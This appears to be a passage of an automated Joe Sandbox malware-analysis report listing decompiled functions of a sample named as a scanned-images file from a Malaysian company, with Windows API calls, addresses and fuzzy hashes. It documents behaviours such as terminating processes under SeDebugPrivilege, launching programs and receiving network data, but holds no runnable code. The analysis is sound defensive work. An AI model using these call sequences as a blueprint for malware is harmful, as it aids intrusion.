                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                        • String ID:
                                                        • API String ID: 4090791747-0
                                                        • Opcode ID: 36e320bc16126000936b56b242db06224a0675bde169641bdd9d4cff4d996bbc
                                                        • Instruction ID: 1d20adef6424834c06e6d079a09671d4e3a90b2cf96f6eb3905253c444c0170b
                                                        • Opcode Fuzzy Hash: 36e320bc16126000936b56b242db06224a0675bde169641bdd9d4cff4d996bbc
                                                        • Instruction Fuzzy Hash: 2FE1A131604301DFCB24EF24D991B6BBBE1AF89354F14896DF8998B2A2DB31DC45CB52
                                                        APIs
                                                          • Part of subcall function 00A848AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A838D3,?), ref: 00A848C7
                                                          • Part of subcall function 00A848AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A838D3,?), ref: 00A848E0
                                                          • Part of subcall function 00A84CD3: GetFileAttributesW.KERNEL32(?,00A83947), ref: 00A84CD4
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00A84FE2
                                                        • _wcscmp.LIBCMT ref: 00A84FFC
                                                        • MoveFileW.KERNEL32(?,?), ref: 00A85017
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                        • String ID:
                                                        • API String ID: 793581249-0
                                                        • Opcode ID: aef86addb1908d345771e6df16388150d2b454178c7cff5551275ae8c378411c
                                                        • Instruction ID: 0ee99979b155b03c4f12c159a704988aee9edf876b4778b50ed394500405a85e
                                                        • Opcode Fuzzy Hash: aef86addb1908d345771e6df16388150d2b454178c7cff5551275ae8c378411c
                                                        • Instruction Fuzzy Hash: 015186B24087859BC724EBA0D9819DFB7ECAF85340F40492EB689D3151EF74A68CC766
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00A78A84,00000B00,?,?), ref: 00A78E0C
                                                        • HeapAlloc.KERNEL32(00000000,?,00A78A84,00000B00,?,?), ref: 00A78E13
                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00A78A84,00000B00,?,?), ref: 00A78E28
                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00A78A84,00000B00,?,?), ref: 00A78E30
                                                        • DuplicateHandle.KERNEL32(00000000,?,00A78A84,00000B00,?,?), ref: 00A78E33
                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00A78A84,00000B00,?,?), ref: 00A78E43
                                                        • GetCurrentProcess.KERNEL32(00A78A84,00000000,?,00A78A84,00000B00,?,?), ref: 00A78E4B
                                                        • DuplicateHandle.KERNEL32(00000000,?,00A78A84,00000B00,?,?), ref: 00A78E4E
                                                        • CreateThread.KERNEL32(00000000,00000000,00A78E74,00000000,00000000,00000000), ref: 00A78E68
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                        • String ID:
                                                        • API String ID: 1957940570-0
                                                        • Opcode ID: 9ecd551fb16794ccd3ede14d9fd34bd829719e40428bbf9e680368b9ff2a2a72
                                                        • Instruction ID: 613b1a6308ed18ee0c82b0f4e9f41261bb3a38a4ed273bf73ddb52970292b7bb
                                                        • Opcode Fuzzy Hash: 9ecd551fb16794ccd3ede14d9fd34bd829719e40428bbf9e680368b9ff2a2a72
                                                        • Instruction Fuzzy Hash: 0D0196B5240309FFE660EBE5DC49F6B7BACEB89711F008521FB05DB1A1DB7498018A20
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$_memset
                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                        • API String ID: 2862541840-625585964
                                                        • Opcode ID: 150ff62167161f6e85388d1711e91197ce5d02142dd2c1eb3fc883f3cf5b5e0d
                                                        • Instruction ID: 929dde032fe3944cbd2d84d48c47b5b82deee09046152283f53180a78ae76cf4
                                                        • Opcode Fuzzy Hash: 150ff62167161f6e85388d1711e91197ce5d02142dd2c1eb3fc883f3cf5b5e0d
                                                        • Instruction Fuzzy Hash: CC917B71A00219BBDF24DFA9C844FAFBBB8EF85710F10855EF615AB280D7709945CBA0
                                                        APIs
                                                          • Part of subcall function 00A77652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A7758C,80070057,?,?,?,00A7799D), ref: 00A7766F
                                                          • Part of subcall function 00A77652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A7758C,80070057,?,?), ref: 00A7768A
                                                          • Part of subcall function 00A77652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A7758C,80070057,?,?), ref: 00A77698
                                                          • Part of subcall function 00A77652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A7758C,80070057,?), ref: 00A776A8
                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00A99B1B
                                                        • _memset.LIBCMT ref: 00A99B28
                                                        • _memset.LIBCMT ref: 00A99C6B
                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00A99C97
                                                        • CoTaskMemFree.OLE32(?), ref: 00A99CA2
                                                        Strings
                                                        • NULL Pointer assignment, xrefs: 00A99CF0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                        • String ID: NULL Pointer assignment
                                                        • API String ID: 1300414916-2785691316
                                                        • Opcode ID: 1f389df508fab6300f84697767495b0719d2c5902ded2a76a3bd169728487324
                                                        • Instruction ID: 71c1fb0fc1519832f19bd3be182ef65b14f17cb6c8f874a96f209b8beb25b588
                                                        • Opcode Fuzzy Hash: 1f389df508fab6300f84697767495b0719d2c5902ded2a76a3bd169728487324
                                                        • Instruction Fuzzy Hash: 64913A71D00229AFDF10DFA8DD85ADEBBB8BF08710F20416AF419A7281DB315A45CFA0
                                                        APIs
                                                          • Part of subcall function 00A83E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00A83EB6
                                                          • Part of subcall function 00A83E91: Process32FirstW.KERNEL32(00000000,?), ref: 00A83EC4
                                                          • Part of subcall function 00A83E91: CloseHandle.KERNEL32(00000000), ref: 00A83F8E
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A9ECB8
                                                        • GetLastError.KERNEL32 ref: 00A9ECCB
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A9ECFA
                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00A9ED77
                                                        • GetLastError.KERNEL32(00000000), ref: 00A9ED82
                                                        • CloseHandle.KERNEL32(00000000), ref: 00A9EDB7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                        • String ID: SeDebugPrivilege
                                                        • API String ID: 2533919879-2896544425
                                                        • Opcode ID: f6c0bfefb6fbe11199543428ea39130d9002cf47350cfb6a0392cf67f735cb0d
                                                        • Instruction ID: 720d9bd99f8292b6435789b31bf4906a2899d4a65317fa324d6289bdc82ef217
                                                        • Opcode Fuzzy Hash: f6c0bfefb6fbe11199543428ea39130d9002cf47350cfb6a0392cf67f735cb0d
                                                        • Instruction Fuzzy Hash: 9E41CC717002019FDB14EF64CD96F6EB7E0AF85714F088429F9469F2C2DB75A805CB92
                                                        APIs
                                                        • ShowWindow.USER32(00AE67B0,00000000,01776368,?,?,00AE67B0,?,00AAB862,?,?), ref: 00AAB9CC
                                                        • EnableWindow.USER32(00000000,00000000), ref: 00AAB9F0
                                                        • ShowWindow.USER32(00AE67B0,00000000,01776368,?,?,00AE67B0,?,00AAB862,?,?), ref: 00AABA50
                                                        • ShowWindow.USER32(00000000,00000004,?,00AAB862,?,?), ref: 00AABA62
                                                        • EnableWindow.USER32(00000000,00000001), ref: 00AABA86
                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00AABAA9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Window$Show$Enable$MessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 642888154-2594219639
                                                        • Opcode ID: 67d3e57c4e196f27db0fa0f576217e7891c65ae0c91ace2cb66f5a3edc3d8482
                                                        • Instruction ID: be6fc0264b6a365aafcb1e8f0911648eaf454e66c3caa2d746225b2823c41dca
                                                        • Opcode Fuzzy Hash: 67d3e57c4e196f27db0fa0f576217e7891c65ae0c91ace2cb66f5a3edc3d8482
                                                        • Instruction Fuzzy Hash: CB414235610241AFDB25CFA4C889BA57BE1FF07354F1841B9EA498F6E3C731A846CB61
                                                        APIs
                                                        • LoadIconW.USER32(00000000,00007F03), ref: 00A832C5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: IconLoad
                                                        • String ID: blank$info$question$stop$warning
                                                        • API String ID: 2457776203-404129466
                                                        • Opcode ID: 1a75b35dec99a8aa73a560a6e2271a02cde544f102104bd54275705d6c2d222c
                                                        • Instruction ID: 8bff8179c792bd46a88fcd3fc5697b686aa79822b066ae0e6dc1d1d164631ea4
                                                        • Opcode Fuzzy Hash: 1a75b35dec99a8aa73a560a6e2271a02cde544f102104bd54275705d6c2d222c
                                                        • Instruction Fuzzy Hash: 1F11E737248346BBAF057B55DC42CEAB3ACEF39B70F20006AF901A62C2F7655B4147A5
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00A8454E
                                                        • LoadStringW.USER32(00000000), ref: 00A84555
                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00A8456B
                                                        • LoadStringW.USER32(00000000), ref: 00A84572
                                                        • _wprintf.LIBCMT ref: 00A84598
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00A845B6
                                                        Strings
                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00A84593
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                        • API String ID: 3648134473-3128320259
                                                        • Opcode ID: a5566bb595f32a553e58d9db37614652a7afc0701b2ba42fedea675cb9719526
                                                        • Instruction ID: 48b6a14c4120c33605f4577e5477bacd2246a182620957bf5226a0bafef89cca
                                                        • Opcode Fuzzy Hash: a5566bb595f32a553e58d9db37614652a7afc0701b2ba42fedea675cb9719526
                                                        • Instruction Fuzzy Hash: 380162F6900209BFE754E7E0DD89EEB776CE709301F0005A5BB49D2091EB749E858B74
                                                        APIs
                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00A5C417,00000004,00000000,00000000,00000000), ref: 00A22ACF
                                                        • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00A5C417,00000004,00000000,00000000,00000000,000000FF), ref: 00A22B17
                                                        • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00A5C417,00000004,00000000,00000000,00000000), ref: 00A5C46A
                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00A5C417,00000004,00000000,00000000,00000000), ref: 00A5C4D6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ShowWindow
                                                        • String ID:
                                                        • API String ID: 1268545403-0
                                                        • Opcode ID: 8b96c6cf65df9a65d04a365c2d8aabf99423157fce44ee67f12a87830a5729af
                                                        • Instruction ID: e895176cf9f94149ff6958859601e8f2759e6d5cdb6235c791c362f8f692c842
                                                        • Opcode Fuzzy Hash: 8b96c6cf65df9a65d04a365c2d8aabf99423157fce44ee67f12a87830a5729af
                                                        • Instruction Fuzzy Hash: EA4119302047D0BED7398B6CAD9CB7A7BB2BB56350F14883DE447469A1C7759886D710
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 00A8737F
                                                          • Part of subcall function 00A40FF6: std::exception::exception.LIBCMT ref: 00A4102C
                                                          • Part of subcall function 00A40FF6: __CxxThrowException@8.LIBCMT ref: 00A41041
                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00A873B6
                                                        • EnterCriticalSection.KERNEL32(?), ref: 00A873D2
                                                        • _memmove.LIBCMT ref: 00A87420
                                                        • _memmove.LIBCMT ref: 00A8743D
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00A8744C
                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00A87461
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00A87480
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 256516436-0
                                                        • Opcode ID: b29e9f5a1a87530b24c5bf63fc1715f98cb59f230fe934da857ac00ef7579fc9
                                                        • Instruction ID: f69fecb26a10bc7eb848637cb5449cbd57d6ba06b39c1db80dcff9b347fdc3a5
                                                        • Opcode Fuzzy Hash: b29e9f5a1a87530b24c5bf63fc1715f98cb59f230fe934da857ac00ef7579fc9
                                                        • Instruction Fuzzy Hash: 5C31A135904205EFCF10EFA4DD85EAEBB78EF85310B1441B5F9049B286DB30DA55DBA0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _memcmp
                                                        • String ID:
                                                        • API String ID: 2931989736-0
                                                        • Opcode ID: fe8866625a95aa1b43db60759e3e1cc45c9f86e5af6f164bbdd018a8f85de702
                                                        • Instruction ID: 77588b3b1585178b3aeeb78dbed74aabdaa3ec7ab5b53ce1763ea27f8671298d
                                                        • Opcode Fuzzy Hash: fe8866625a95aa1b43db60759e3e1cc45c9f86e5af6f164bbdd018a8f85de702
                                                        • Instruction Fuzzy Hash: 9421C275600205FBE210A6209E42FBB77ACAF513B4F44C129FD0D96287F751DE1282E5
                                                        APIs
                                                          • Part of subcall function 00A29997: __itow.LIBCMT ref: 00A299C2
                                                          • Part of subcall function 00A29997: __swprintf.LIBCMT ref: 00A29A0C
                                                          • Part of subcall function 00A3FEC6: _wcscpy.LIBCMT ref: 00A3FEE9
                                                        • _wcstok.LIBCMT ref: 00A8EEFF
                                                        • _wcscpy.LIBCMT ref: 00A8EF8E
                                                        • _memset.LIBCMT ref: 00A8EFC1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                        • String ID: X
                                                        • API String ID: 774024439-3081909835
                                                        • Opcode ID: f355f5c236fa1b38f6eddf205f3d52d2e721c4a83ef25b0f87330783107276c0
                                                        • Instruction ID: b4be5a47bf565b472d7e67c454adebbe5b93f621adc199e0ebb2005c428f29a1
                                                        • Opcode Fuzzy Hash: f355f5c236fa1b38f6eddf205f3d52d2e721c4a83ef25b0f87330783107276c0
                                                        • Instruction Fuzzy Hash: 5EC15C755083119FC724EF28DA85A6BB7E4BF84310F04497DF999972A2DB30ED45CB82
                                                        APIs
                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00A96F14
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00A96F35 (import resolved by ordinal only; ordinal 17 of wsock32.dll is recvfrom, which together with the select/inet_ntoa/htons calls below is a UDP receive that also reports the peer address)
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00A96F48
                                                        • htons.WSOCK32(?,?,?,00000000,?), ref: 00A96FFE
                                                        • inet_ntoa.WSOCK32(?), ref: 00A96FBB
                                                          • Part of subcall function 00A7AE14: _strlen.LIBCMT ref: 00A7AE1E
                                                          • Part of subcall function 00A7AE14: _memmove.LIBCMT ref: 00A7AE40
                                                        • _strlen.LIBCMT ref: 00A97058
                                                        • _memmove.LIBCMT ref: 00A970C1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                        • String ID:
                                                        • API String ID: 3619996494-0
                                                        • Opcode ID: 1f07da7bfd553e626ec86d173149391cb143e17e7e6fbab96982fb1b6b147151
                                                        • Instruction ID: eb75d0178904a703066177599a60b754a86efdc6d513a9ebc113f8d3216bde93
                                                        • Opcode Fuzzy Hash: 1f07da7bfd553e626ec86d173149391cb143e17e7e6fbab96982fb1b6b147151
                                                        • Instruction Fuzzy Hash: 5F81D231608310AFDB14EB28DD86F6FB3E9AF84B14F148929F5559B292DB70DD01C7A1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 75afde177dcb68e69d915f2b94104c1b268103628278374b2c81292b32c5ee30
                                                        • Instruction ID: 4fc560ebfb5df50b7f83ba1c60d90efd1c804be9caa58dbda771a11b82d9dc70
                                                        • Opcode Fuzzy Hash: 75afde177dcb68e69d915f2b94104c1b268103628278374b2c81292b32c5ee30
                                                        • Instruction Fuzzy Hash: 93718D70900119EFCB04DF98DC89ABEBB79FF95311F148169F915AA251C734AA51CFA0
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A9F75C
                                                        • _memset.LIBCMT ref: 00A9F825
                                                        • ShellExecuteExW.SHELL32(?), ref: 00A9F86A
                                                          • Part of subcall function 00A29997: __itow.LIBCMT ref: 00A299C2
                                                          • Part of subcall function 00A29997: __swprintf.LIBCMT ref: 00A29A0C
                                                          • Part of subcall function 00A3FEC6: _wcscpy.LIBCMT ref: 00A3FEE9
                                                        • GetProcessId.KERNEL32(00000000), ref: 00A9F8E1
                                                        • CloseHandle.KERNEL32(00000000), ref: 00A9F910
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
